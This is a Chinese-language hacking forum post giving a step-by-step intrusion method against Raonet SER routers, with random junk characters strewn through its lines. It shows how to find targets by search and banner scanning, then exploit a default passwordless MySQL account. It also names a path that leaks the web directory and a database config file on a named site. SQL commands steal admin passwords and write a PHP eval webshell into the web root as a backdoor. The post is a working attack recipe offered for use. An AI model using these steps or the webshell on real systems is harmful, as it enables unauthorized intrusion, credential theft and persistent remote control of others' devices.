寻找存在漏洞的路由器方法:# z& n( @6 N5 l
h' R$ }4 X; ?) J
1:google搜索'Raonet Subscriber Ethernet Router'8 ^+ F- l+ p: I
" ~) i j7 g4 [% Z8 F! w! Q2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
2 h" E4 E: u9 a: O: _2 c3 z u
8 ~: w" Q2 w6 Z3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。: H2 T7 @( K- t" M, L G+ \
* [, |( H6 I# b0 ]4 S//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
m6 b4 o; d7 l9 `4 A& |- P2 x4 N: }9 Y
3 z3 k5 D5 c0 k6 l! e, h* ^3 U
% \' F p# }% @+ C) X
入侵步骤:0 h/ z _3 [- N
! O' ?5 h! A% D1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
$ I+ q. t3 l- Z5 e y
6 K9 R, L( P; n$ q& R/ D2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc. m* X( T' V: h8 `7 E6 `; B* V
3:得到密码后连接,查看GUI管理密码:" r" C+ {5 n- J8 p- v
use ser_5003 ^$ Q# ]$ y/ e6 F
select id,passwd from user;; G% O+ e( |& D# U; j! [6 z& }) S
4:通过数据库写入webshell,执行命令:+ N/ O) E) X# x) X
use mysql;
1 Y' h) ^! l. S6 Rcreate table ok(cmd TEXT);
; x) O5 B0 O/ F l6 D# h0 w5 ?2 {insert into ok values("<?php @eval($_POST[cmd])?>");
* h3 l$ `, k; H% ]% cselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
! P# o/ K+ v/ v1 Z8 ?drop table ok;
0 o' \# E. J& W; j$ |+ E' H& i$ U: n( {1 {+ f y$ L# P& _
5:连接后门shell.php
8 ?+ [% D5 W! S) s
& n+ |9 O, d K* Z6. 搞定!1 W8 X! }% q2 N
/ N/ N, u3 h3 e. n# O# h) b7 b
|